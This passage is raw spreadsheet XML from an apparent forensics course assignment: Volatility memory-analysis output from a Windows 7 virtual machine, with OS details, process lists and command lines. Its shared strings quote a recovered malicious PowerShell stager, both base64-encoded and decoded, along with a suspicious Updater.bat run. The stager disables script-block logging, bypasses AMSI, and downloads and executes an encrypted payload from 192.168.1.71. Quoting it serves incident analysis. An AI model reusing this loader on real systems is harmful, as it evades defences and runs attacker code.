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netology-homework\netology-homework\SIB-39\sib-Diplom-Track-Forensics\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7AD506C0-6DA8-432E-B0A5-ECCF85D1763D}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-16320" windowWidth="29040" windowHeight="15720" activeTab="8" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="OS Info" sheetId="1" r:id="rId1"/>
    <sheet name="Process list" sheetId="2" r:id="rId2"/>
    <sheet name="PS Tree" sheetId="3" r:id="rId3"/>
    <sheet name="Modules" sheetId="4" r:id="rId4"/>
    <sheet name="net" sheetId="5" r:id="rId5"/>
    <sheet name="DriveScan" sheetId="6" r:id="rId6"/>
    <sheet name="psxview" sheetId="7" r:id="rId7"/>
    <sheet name="hashdump" sheetId="8" r:id="rId8"/>
    <sheet name="files" sheetId="10" r:id="rId9"/>
    <sheet name="cmdLine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2" l="1"/>
  <c r="D17" i="12"/>
  <c r="D18" i="12"/>
  <c r="D19" i="12"/>
  <c r="D20" i="12"/>
  <c r="D21" i="12"/>
  <c r="D22" i="12"/>
  <c r="D23" i="12"/>
  <c r="D25" i="12"/>
  <c r="D26" i="12"/>
  <c r="D27" i="12"/>
  <c r="D34" i="12"/>
  <c r="D35" i="12"/>
  <c r="D42" i="12"/>
  <c r="E42" i="12"/>
  <c r="F42" i="12"/>
  <c r="H42" i="12"/>
  <c r="F64" i="12"/>
  <c r="C13237" i="10"/>
  <c r="E7998" i="10"/>
  <c r="E7999" i="10"/>
  <c r="E8000" i="10"/>
  <c r="E8001" i="10"/>
  <c r="E8002" i="10"/>
  <c r="E8003" i="10"/>
  <c r="E8004" i="10"/>
  <c r="E8005" i="10"/>
  <c r="E8006" i="10"/>
  <c r="E8007" i="10"/>
  <c r="E8008" i="10"/>
  <c r="E8009" i="10"/>
  <c r="E8010" i="10"/>
  <c r="E8011" i="10"/>
  <c r="E8012" i="10"/>
  <c r="E8013" i="10"/>
  <c r="E8014" i="10"/>
  <c r="E8015" i="10"/>
  <c r="E8016" i="10"/>
  <c r="E8017" i="10"/>
  <c r="E8018" i="10"/>
  <c r="E8019" i="10"/>
  <c r="E8020" i="10"/>
  <c r="E8021" i="10"/>
  <c r="E8022" i="10"/>
  <c r="E8023" i="10"/>
  <c r="E8024" i="10"/>
  <c r="E8025" i="10"/>
  <c r="E8026" i="10"/>
  <c r="E8027" i="10"/>
  <c r="E8028" i="10"/>
  <c r="E8029" i="10"/>
  <c r="E8031" i="10"/>
  <c r="E8032" i="10"/>
  <c r="E8033" i="10"/>
  <c r="E8034" i="10"/>
  <c r="E8037" i="10"/>
  <c r="E8039" i="10"/>
  <c r="E8040" i="10"/>
  <c r="C8130" i="10"/>
  <c r="C8131" i="10"/>
  <c r="E8226" i="10"/>
  <c r="E8228" i="10"/>
  <c r="E8229" i="10"/>
  <c r="E8231" i="10"/>
  <c r="C8243" i="10"/>
  <c r="C8244" i="10"/>
  <c r="C8245" i="10"/>
  <c r="C8246" i="10"/>
  <c r="C8247" i="10"/>
  <c r="C8248" i="10"/>
  <c r="C8249" i="10"/>
  <c r="C8250" i="10"/>
  <c r="C8251" i="10"/>
  <c r="C8252" i="10"/>
  <c r="C8253" i="10"/>
  <c r="C8254" i="10"/>
  <c r="C8255" i="10"/>
  <c r="C8256" i="10"/>
  <c r="C8257" i="10"/>
  <c r="C8258" i="10"/>
  <c r="C8259" i="10"/>
  <c r="C8260" i="10"/>
  <c r="C8261" i="10"/>
  <c r="C8262" i="10"/>
  <c r="C8263" i="10"/>
  <c r="C8264" i="10"/>
  <c r="C8265" i="10"/>
  <c r="C8266" i="10"/>
  <c r="C8267" i="10"/>
  <c r="C8268" i="10"/>
  <c r="C8269" i="10"/>
  <c r="C8270" i="10"/>
  <c r="C8271" i="10"/>
  <c r="C8272" i="10"/>
  <c r="C8273" i="10"/>
  <c r="C8274" i="10"/>
  <c r="C8275" i="10"/>
  <c r="C8276" i="10"/>
  <c r="C8277" i="10"/>
  <c r="C8278" i="10"/>
  <c r="C8279" i="10"/>
  <c r="C8280" i="10"/>
  <c r="C8281" i="10"/>
  <c r="E9883" i="10"/>
  <c r="E9884" i="10"/>
  <c r="E9885" i="10"/>
  <c r="E9887" i="10"/>
  <c r="E9890" i="10"/>
  <c r="E9891" i="10"/>
  <c r="E9892" i="10"/>
  <c r="E9893" i="10"/>
  <c r="E9894" i="10"/>
  <c r="E9895" i="10"/>
  <c r="E9896" i="10"/>
  <c r="E9897" i="10"/>
  <c r="E9898" i="10"/>
  <c r="E9899" i="10"/>
  <c r="E9900" i="10"/>
  <c r="E9901" i="10"/>
  <c r="E9902" i="10"/>
  <c r="E9903" i="10"/>
  <c r="E9904" i="10"/>
  <c r="E9905" i="10"/>
  <c r="E9906" i="10"/>
  <c r="E9907" i="10"/>
  <c r="E9908" i="10"/>
  <c r="E9909" i="10"/>
  <c r="E9910" i="10"/>
  <c r="E9911" i="10"/>
  <c r="E9912" i="10"/>
  <c r="E9913" i="10"/>
  <c r="E9914" i="10"/>
  <c r="E9915" i="10"/>
  <c r="E9917" i="10"/>
  <c r="E9918" i="10"/>
  <c r="E9919" i="10"/>
  <c r="E9920" i="10"/>
  <c r="E9921" i="10"/>
  <c r="E9922" i="10"/>
  <c r="E9923" i="10"/>
  <c r="E9925" i="10"/>
  <c r="E9926" i="10"/>
  <c r="C7848" i="10"/>
  <c r="C7849" i="10"/>
  <c r="C7852" i="10"/>
  <c r="C7853" i="10"/>
  <c r="C7870" i="10"/>
  <c r="C7871" i="10"/>
  <c r="C7936" i="10"/>
  <c r="C7938" i="10"/>
  <c r="D1138" i="10"/>
  <c r="D1130" i="10"/>
  <c r="R9" i="3"/>
  <c r="P14" i="3"/>
  <c r="Q14" i="3"/>
  <c r="R14" i="3"/>
  <c r="T14" i="3"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="48853" uniqueCount="28106">
  <si>
    <t>Kernel</t>
  </si>
  <si>
    <t>Base</t>
  </si>
  <si>
    <t>0x8260d000</t>
  </si>
  <si>
    <t>DTB</t>
  </si>
  <si>
    <t>0x185000</t>
  </si>
  <si>
    <t>Symbols</t>
  </si>
  <si>
    <t>file:///D:/dip/volatility3-2.26.2/volatility3/symbols/windows/ntkrpamp.pdb/15D6521430124AA9BD225B3723E471E1-2.json.xz</t>
  </si>
  <si>
    <t>Is64Bit</t>
  </si>
  <si>
    <t>False</t>
  </si>
  <si>
    <t>IsPAE</t>
  </si>
  <si>
    <t>True</t>
  </si>
  <si>
    <t>layer_name</t>
  </si>
  <si>
    <t>WindowsIntelPAE</t>
  </si>
  <si>
    <t>memory_layer</t>
  </si>
  <si>
    <t>FileLayer</t>
  </si>
  <si>
    <t>KdDebuggerDataBlock</t>
  </si>
  <si>
    <t>0x82745de8</t>
  </si>
  <si>
    <t>NTBuildLab</t>
  </si>
  <si>
    <t>7601.24354.x86fre.win7sp1_ldr_es</t>
  </si>
  <si>
    <t>CSDVersion</t>
  </si>
  <si>
    <t>KdVersionBlock</t>
  </si>
  <si>
    <t>0x82745dc0</t>
  </si>
  <si>
    <t>Major/Minor</t>
  </si>
  <si>
    <t>15.7601</t>
  </si>
  <si>
    <t>MachineType</t>
  </si>
  <si>
    <t>KeNumberProcessors</t>
  </si>
  <si>
    <t>SystemTime</t>
  </si>
  <si>
    <t>13:06:28+00:00</t>
  </si>
  <si>
    <t>NtSystemRoot</t>
  </si>
  <si>
    <t>C:\Windows</t>
  </si>
  <si>
    <t>NtProductType</t>
  </si>
  <si>
    <t>NtProductWinNt</t>
  </si>
  <si>
    <t>NtMajorVersion</t>
  </si>
  <si>
    <t>NtMinorVersion</t>
  </si>
  <si>
    <t>PE</t>
  </si>
  <si>
    <t>MajorOperatingSystemVersion</t>
  </si>
  <si>
    <t>MinorOperatingSystemVersion</t>
  </si>
  <si>
    <t>Machine</t>
  </si>
  <si>
    <t>TimeDateStamp</t>
  </si>
  <si>
    <t>Wed</t>
  </si>
  <si>
    <t>Jan</t>
  </si>
  <si>
    <t>PID</t>
  </si>
  <si>
    <t>PPID</t>
  </si>
  <si>
    <t>ImageFileName</t>
  </si>
  <si>
    <t>Offset(V)</t>
  </si>
  <si>
    <t>Threads</t>
  </si>
  <si>
    <t>Handles</t>
  </si>
  <si>
    <t>SessionId</t>
  </si>
  <si>
    <t>Wow64</t>
  </si>
  <si>
    <t>CreateTime</t>
  </si>
  <si>
    <t>ExitTime</t>
  </si>
  <si>
    <t>File</t>
  </si>
  <si>
    <t>output</t>
  </si>
  <si>
    <t>System</t>
  </si>
  <si>
    <t>0x84ed1b90</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>11:32:09.000000</t>
  </si>
  <si>
    <t>UTC</t>
  </si>
  <si>
    <t>Disabled</t>
  </si>
  <si>
    <t>smss.exe</t>
  </si>
  <si>
    <t>0x85783280</t>
  </si>
  <si>
    <t>csrss.exe</t>
  </si>
  <si>
    <t>0x85ebb030</t>
  </si>
  <si>
    <t>11:32:11.000000</t>
  </si>
  <si>
    <t>wininit.exe</t>
  </si>
  <si>
    <t>0x85dbf030</t>
  </si>
  <si>
    <t>11:32:14.000000</t>
  </si>
  <si>
    <t>0x84fbba78</t>
  </si>
  <si>
    <t>winlogon.exe</t>
  </si>
  <si>
    <t>0x85fc9b20</t>
  </si>
  <si>
    <t>services.exe</t>
  </si>
  <si>
    <t>0x86001200</t>
  </si>
  <si>
    <t>11:32:15.000000</t>
  </si>
  <si>
    <t>lsass.exe</t>
  </si>
  <si>
    <t>0x86007b00</t>
  </si>
  <si>
    <t>lsm.exe</t>
  </si>
  <si>
    <t>0x86008030</t>
  </si>
  <si>
    <t>svchost.exe</t>
  </si>
  <si>
    <t>0x8606aa20</t>
  </si>
  <si>
    <t>11:32:16.000000</t>
  </si>
  <si>
    <t>VBoxService.ex</t>
  </si>
  <si>
    <t>0x86088030</t>
  </si>
  <si>
    <t>0x86097918</t>
  </si>
  <si>
    <t>0x860b7140</t>
  </si>
  <si>
    <t>0x860f6388</t>
  </si>
  <si>
    <t>0x860ff888</t>
  </si>
  <si>
    <t>0x86108608</t>
  </si>
  <si>
    <t>0x86145630</t>
  </si>
  <si>
    <t>11:32:19.000000</t>
  </si>
  <si>
    <t>0x85946d20</t>
  </si>
  <si>
    <t>spoolsv.exe</t>
  </si>
  <si>
    <t>0x8596ad20</t>
  </si>
  <si>
    <t>0x859783e0</t>
  </si>
  <si>
    <t>0x859be5b8</t>
  </si>
  <si>
    <t>11:32:20.000000</t>
  </si>
  <si>
    <t>0x859d7030</t>
  </si>
  <si>
    <t>cygrunsrv.exe</t>
  </si>
  <si>
    <t>0x84fad4e0</t>
  </si>
  <si>
    <t>wlms.exe</t>
  </si>
  <si>
    <t>0x863cc308</t>
  </si>
  <si>
    <t>0x863e5030</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>conhost.exe</t>
  </si>
  <si>
    <t>0x863e9030</t>
  </si>
  <si>
    <t>sshd.exe</t>
  </si>
  <si>
    <t>0x863ef030</t>
  </si>
  <si>
    <t>sppsvc.exe</t>
  </si>
  <si>
    <t>0x86430030</t>
  </si>
  <si>
    <t>11:32:21.000000</t>
  </si>
  <si>
    <t>0x86446b70</t>
  </si>
  <si>
    <t>11:32:22.000000</t>
  </si>
  <si>
    <t>0x85f67688</t>
  </si>
  <si>
    <t>11:34:21.000000</t>
  </si>
  <si>
    <t>SearchIndexer.</t>
  </si>
  <si>
    <t>0x85f8e8c0</t>
  </si>
  <si>
    <t>11:34:23.000000</t>
  </si>
  <si>
    <t>taskhost.exe</t>
  </si>
  <si>
    <t>0x851f4a38</t>
  </si>
  <si>
    <t>12:30:35.000000</t>
  </si>
  <si>
    <t>dwm.exe</t>
  </si>
  <si>
    <t>0x851fc180</t>
  </si>
  <si>
    <t>explorer.exe</t>
  </si>
  <si>
    <t>0x851f4440</t>
  </si>
  <si>
    <t>cmd.exe</t>
  </si>
  <si>
    <t>0x851fea60</t>
  </si>
  <si>
    <t>0x85204320</t>
  </si>
  <si>
    <t>powershell.exe</t>
  </si>
  <si>
    <t>0x85206030</t>
  </si>
  <si>
    <t>VBoxTray.exe</t>
  </si>
  <si>
    <t>0x85255d20</t>
  </si>
  <si>
    <t>12:30:40.000000</t>
  </si>
  <si>
    <t>iexplore.exe</t>
  </si>
  <si>
    <t>0x85256468</t>
  </si>
  <si>
    <t>0x85250d20</t>
  </si>
  <si>
    <t>audiodg.exe</t>
  </si>
  <si>
    <t>0x851d6d20</t>
  </si>
  <si>
    <t>WmiPrvSE.exe</t>
  </si>
  <si>
    <t>0x8614c8e0</t>
  </si>
  <si>
    <t>12:40:31.000000</t>
  </si>
  <si>
    <t>0x850a6870</t>
  </si>
  <si>
    <t>12:40:53.000000</t>
  </si>
  <si>
    <t>wuauclt.exe</t>
  </si>
  <si>
    <t>0x863f7a70</t>
  </si>
  <si>
    <t>12:57:25.000000</t>
  </si>
  <si>
    <t>FTK</t>
  </si>
  <si>
    <t>Imager.exe</t>
  </si>
  <si>
    <t>0x853239e0</t>
  </si>
  <si>
    <t>13:05:52.000000</t>
  </si>
  <si>
    <t>MpCmdRun.exe</t>
  </si>
  <si>
    <t>0x851b9d20</t>
  </si>
  <si>
    <t>13:06:39.000000</t>
  </si>
  <si>
    <t>Audit</t>
  </si>
  <si>
    <t>Cmd</t>
  </si>
  <si>
    <t>Path</t>
  </si>
  <si>
    <t>*</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Windows\System32\smss.exe</t>
  </si>
  <si>
    <t>\SystemRoot\System32\smss.exe</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Windows\System32\csrss.exe</t>
  </si>
  <si>
    <t>%SystemRoot%\system32\csrss.exe</t>
  </si>
  <si>
    <t>ObjectDirectory=\Windows</t>
  </si>
  <si>
    <t>SharedSection=1024,12288,512</t>
  </si>
  <si>
    <t>Windows=On</t>
  </si>
  <si>
    <t>SubSystemType=Windows</t>
  </si>
  <si>
    <t>ServerDll=basesrv,1</t>
  </si>
  <si>
    <t>ServerDll=winsrv:UserServerDllInitialization,3</t>
  </si>
  <si>
    <t>ServerDll=winsrv:ConServerDllInitialization,2</t>
  </si>
  <si>
    <t>ServerDll=sxssrv,4</t>
  </si>
  <si>
    <t>ProfileControl=Off</t>
  </si>
  <si>
    <t>MaxRequestThreads=16</t>
  </si>
  <si>
    <t>C:\Windows\system32\csrss.exe</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Windows\System32\conhost.exe</t>
  </si>
  <si>
    <t>\??\C:\Windows\system32\conhost.exe</t>
  </si>
  <si>
    <t>1238788108538425884-910628392408509066-9957047621558862419-5072041261499987778     C:\Windows\system32\conhost.exe</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Windows\System32\winlogon.exe</t>
  </si>
  <si>
    <t>C:\Windows\system32\winlogon.exe</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Windows\explorer.exe</t>
  </si>
  <si>
    <t>C:\Windows\Explorer.EXE</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Program</t>
  </si>
  <si>
    <t>Files\Internet</t>
  </si>
  <si>
    <t>Explorer\iexplore.exe</t>
  </si>
  <si>
    <t>C:\Program Files\Internet Explorer\iexplore.exe</t>
  </si>
  <si>
    <t>/WERRESTART</t>
  </si>
  <si>
    <t>C:\Program</t>
  </si>
  <si>
    <t>**</t>
  </si>
  <si>
    <t>SCODEF:992</t>
  </si>
  <si>
    <t>CREDAT:209921</t>
  </si>
  <si>
    <t>/prefetch:2</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Windows\System32\VBoxTray.exe</t>
  </si>
  <si>
    <t>C:\Windows\System32\VBoxTray.exe</t>
  </si>
  <si>
    <t>\Device\VBoxMiniRdr\Vboxsvr\d_drive\Imager_Lite_3.1.1\FTK</t>
  </si>
  <si>
    <t>\\Vboxsvr\d_drive\Imager_Lite_3.1.1\FTK Imager.exe</t>
  </si>
  <si>
    <t>\\Vboxsvr\d_drive\Imager_Lite_3.1.1\FTK</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Windows\System32\cmd.exe</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe</t>
  </si>
  <si>
    <t>/c</t>
  </si>
  <si>
    <t>C:\Users\Wilfred\AppData\Roaming\Identities\Updater.bat</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</t>
  </si>
  <si>
    <t>powershell</t>
  </si>
  <si>
    <t>SQBGACgAJABQAFMAVgBlAFIAUwBpAE8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAHIAUwBJAE8ATgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBzAEUAbQBiAGwAeQAuAEcARQB0AFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkAZQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAVABWAEEAbAB1AGUAKAAkAE4AVQBsAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAG8AbABMAGUAYwB0AEkATwBuAHMALgBHAGUAbgBFAHIASQBDAC4ARABpAGMAdABJAG8ATgBBAHIAeQBbAHMAVABSAEkATgBnACwAUwBZAFMAdABlAG0ALgBPAEIAagBFAEMAVABdAF0AOgA6AG4ARQBXACgAKQA7ACQAVgBBAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEATAB9AEUATABTAGUAewBbAFMAYwByAEkAcAB0AEIAbABPAEMASwBdAC4AIgBHAEUAVABGAGkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBhAGwAdQBFACgAJABuAFUATABsACwAKABOAGUAdwAtAE8AYgBqAGUAYwBUACAAQwBvAGwATABlAEMAdABJAE8ATgBzAC4ARwBFAE4ARQBSAGkAQwAuAEgAYQBzAEgAUwBFAFQAWwBzAFQAUgBJAG4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBJAGUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEAbAB1AEUAKAAkAG4AVQBsAEwALAAkAFQAUgB1AGUAKQB9ADsAfQA7AFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFMARQBSAFYAaQBjAGUAUABvAGkAbgB0AE0AQQBOAEEAZwBFAHIAXQA6ADoARQBYAFAAZQBDAFQAMQAwADAAQwBPAG4AVABpAE4AVQBlAD0AMAA7ACQAVwBjAD0ATgBlAHcALQBPAEIAagBlAEMAVAAgAFMAWQBTAHQAZQBtAC4ATgBFAHQALgBXAEUAQgBDAEwASQBlAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQARQByAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAcgBPAFgAWQA9AFsAUwBZAHMAdABFAG0ALgBOAEUAdAAuAFcARQBCAFIAZQBRAFUAZQBTAHQAXQA6ADoARABlAEYAYQB1AGwAdABXAGUAQgBQAFIAbwB4AFkAOwAkAFcAQwAuAFAAUgBPAHgAeQAuAEMAcgBFAEQAZQBuAHQASQBhAEwAUwAgAD0AIABbAFMAWQBTAFQAZQBtAC4ATgBFAFQALgBDAHIAZQBEAGUAbgB0AGkAQQBsAEMAYQBjAEgARQBdADoAOgBEAEUAZgBhAHUAbABUAE4AZQB0AHcATwBSAGsAQwBSAGUARABFAE4AdABpAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAHMAVABFAE0ALgBUAGUAWABUAC4ARQBuAGMAbwBEAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQBUAEUAUwAoACcAXQBoAHEAMQBqACkAYwAjADwAWQA1AEYAUgA4AFgALwBCAHYAYQB3AHsAJgA2AC4ARQAhAD4ASwB+AHoATQAlACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA3ADEAOgA4ADAAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAVwBjAC4ASABlAGEARABFAFIAUwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AagArAGYAdgA3AFMAMQBUAEEAcwBhAG4ASABsAHIAMwBzAGIARAB1AHIAbgBzAHkAZAByADQAPQAiACkAOwAkAEQAYQBUAEEAPQAkAFcAQwAuAEQATwB3AG4ATABvAGEARABEAEEAVABhACgAJABTAGUAcgArACQAdAApADsAJABpAFYAPQAkAGQAQQB0AGEAWwAwAC4ALgAzAF0AOwAkAEQAQQBUAEEAPQAkAGQAQQB0AGEAWwA0AC4ALgAkAGQAQQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQB0AEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==</t>
  </si>
  <si>
    <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</t>
  </si>
  <si>
    <t>Files\Windows</t>
  </si>
  <si>
    <t>Defender\MpCmdRun.exe</t>
  </si>
  <si>
    <t>IF($PSVeRSiONTaBlE.PSVerSION.MajOr -gE 3){$GPF=[ref].ASsEmbly.GEtTYPe('System.Management.Automation.Utils')."GEtFie`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){$GPC=$GPF.GeTVAlue($NUll);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAl=[ColLectIOns.GenErIC.DictIoNAry[sTRINg,SYStem.OBjECT]]::nEW();$VAl.ADd('EnableScriptB'+'lockLogging',0);$vAl.AdD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$vAL}ELSe{[ScrIptBlOCK]."GETFie`lD"('signatures','N'+'onPublic,Static').SEtValuE($nULl,(New-ObjecT ColLeCtIONs.GENERiC.HasHSET[sTRInG]))}[Ref].ASSeMbLY.GeTTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFIelD('amsiInitFailed','NonPublic,Static').SeTVAluE($nUlL,$TRue)};};[SYSTEm.Net.SERVicePointMANAgEr]::EXPeCT100COnTiNUe=0;$Wc=New-OBjeCT SYStem.NEt.WEBCLIeNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEADErS.ADD('User-Agent',$u);$WC.PrOXY=[SYstEm.NEt.WEBReQUeSt]::DeFaultWeBPRoxY;$WC.PROxy.CrEDentIaLS = [SYSTem.NET.CreDentiAlCacHE]::DEfaulTNetwORkCReDENtiaLs;$Script:Proxy = $wc.Proxy;$K=[SYsTEM.TeXT.EncoDING]::ASCII.GEtByTES(']hq1j)c#&lt;Y5FR8X/Bvaw{&amp;6.E!&gt;K~zM%');$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXOR$S[($S[$I]+$S[$H])%256]}};$ser='http://192.168.1.71:80';$t='/news.php';$Wc.HeaDERS.AdD("Cookie","session=j+fv7S1TAsanHlr3sbDurnsydr4=");$DaTA=$WC.DOwnLoaDDATa($Ser+$t);$iV=$dAta[0..3];$DATA=$dAta[4..$dAta.leNGth];-jOIn[ChAR[]](&amp; $R $DatA ($IV+$K))|IEX</t>
  </si>
  <si>
    <t>Offset</t>
  </si>
  <si>
    <t>Size</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>0x84ec8c98</t>
  </si>
  <si>
    <t>0x428000</t>
  </si>
  <si>
    <t>ntoskrnl.exe</t>
  </si>
  <si>
    <t>\SystemRoot\system32\ntkrnlpa.exe</t>
  </si>
  <si>
    <t>0x84ec8c20</t>
  </si>
  <si>
    <t>0x82a35000</t>
  </si>
  <si>
    <t>0x28000</t>
  </si>
  <si>
    <t>hal.dll</t>
  </si>
  <si>
    <t>\SystemRoot\system32\halacpi.dll</t>
  </si>
  <si>
    <t>0x84ec8ba0</t>
  </si>
  <si>
    <t>0x80ba2000</t>
  </si>
  <si>
    <t>0x8000</t>
  </si>
  <si>
    <t>kdcom.dll</t>
  </si>
  <si>
    <t>\SystemRoot\system32\kdcom.dll</t>
  </si>
  <si>
    <t>0x84ec8b20</t>
  </si>
  <si>
    <t>0x8ba3a000</t>
  </si>
  <si>
    <t>0x85000</t>
  </si>
  <si>
    <t>mcupdate.dll</t>
  </si>
  <si>
    <t>\SystemRoot\system32\mcupdate_GenuineIntel.dll</t>
  </si>
  <si>
    <t>0x84ec8aa0</t>
  </si>
  <si>
    <t>0x8babf000</t>
  </si>
  <si>
